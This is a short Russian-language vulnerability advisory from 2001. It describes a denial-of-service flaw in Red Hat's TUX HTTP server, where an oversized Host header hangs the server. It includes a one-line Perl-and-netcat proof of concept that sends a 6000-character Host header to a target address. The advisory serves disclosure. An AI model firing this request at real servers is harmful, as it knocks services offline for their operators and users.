Security Lab

Dos против Red Hat TUX HTTP Server

Дата публикации:09.11.2001
Всего просмотров:1087
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

TUX - свободно распространяемый HTTP сервер. Сервер может обслуживать статическое содержание, кэшировать динамическое содержание, и взаимодействовать с другими HTTP серверами.

Ошибка возникает, когда TUX daemon получает host:header, c завышенными размерами, как часть HTTP запроса. Такой запрос приводит к зависанию сервера и для нормальной работы потребуется перезагрузка.

Пример:

perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
qq(\n)" |nc <ip address> <dest_port>
Уязвимость найдена a.orawe@ntlworld.com